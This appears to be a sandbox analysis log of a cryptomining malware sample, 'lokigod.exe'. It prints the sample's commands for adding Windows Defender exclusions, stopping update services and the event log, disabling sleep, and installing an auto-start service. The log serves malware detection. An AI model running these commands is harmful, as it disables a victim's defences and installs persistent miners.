          Source: 0000003B.00000002.3311685966.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
          Source: Process Memory Space: svchost.exe PID: 7636, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
          Source: classification engineClassification label: mal100.spyw.evad.mine.winEXE@88/12@2/1
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7392:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7472:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5540:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6512:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7924:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7732:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7636:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7376:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7780:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7348:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6500:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7956:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8020:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8184:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7532:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7628:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8004:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7876:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7368:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6504:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8124:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7060:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7476:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7828:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2072:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7940:120:WilError_03
          Source: C:\Windows\System32\svchost.exeMutant created: \BaseNamedObjects\Global\qtltrbgpvurodlwl
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_saebe5py.3p3.ps1Jump to behavior
          Source: lokigod.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Users\user\Desktop\lokigod.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: lokigod.exeReversingLabs: Detection: 76%
          Source: C:\Users\user\Desktop\lokigod.exeFile read: C:\Users\user\Desktop\lokigod.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\lokigod.exe "C:\Users\user\Desktop\lokigod.exe"
          Source: C:\Users\user\Desktop\lokigod.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\lokigod.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Users\user\Desktop\lokigod.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Users\user\Desktop\lokigod.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\lokigod.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\lokigod.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\lokigod.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\lokigod.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\Users\user\Desktop\lokigod.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\lokigod.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\lokigod.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\lokigod.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "LBFXRZGB"
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\lokigod.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "LBFXRZGB" binpath= "C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe" start= "auto"
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\lokigod.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
          Source: C:\Users\user\Desktop\lokigod.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "LBFXRZGB"
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe
          Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
          Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exeProcess created: C:\Windows\System32\svchost.exe svchost.exe
          Source: C:\Users\user\Desktop\lokigod.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
          Source: C:\Users\user\Desktop\lokigod.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
          Source: C:\Users\user\Desktop\lokigod.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvcJump to behavior
          Source: C:\Users\user\Desktop\lokigod.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvcJump to behavior
          Source: C:\Users\user\Desktop\lokigod.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauservJump to behavior
          Source: C:\Users\user\Desktop\lokigod.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bitsJump to behavior
          Source: C:\Users\user\Desktop\lokigod.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvcJump to behavior
          Source: C:\Users\user\Desktop\lokigod.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
          Source: C:\Users\user\Desktop\lokigod.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
          Source: C:\Users\user\Desktop\lokigod.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
          Source: C:\Users\user\Desktop\lokigod.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
          Source: C:\Users\user\Desktop\lokigod.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "LBFXRZGB"Jump to behavior
          Source: C:\Users\user\Desktop\lokigod.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "LBFXRZGB" binpath= "C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe" start= "auto"Jump to behavior
          Source: C:\Users\user\Desktop\lokigod.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlogJump to behavior
          Source: C:\Users\user\Desktop\lokigod.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "LBFXRZGB"Jump to behavior
